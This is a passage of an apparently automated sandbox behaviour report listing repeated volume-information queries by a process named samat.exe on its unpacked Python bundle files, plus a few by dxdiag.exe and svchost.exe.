Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dxdiag.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
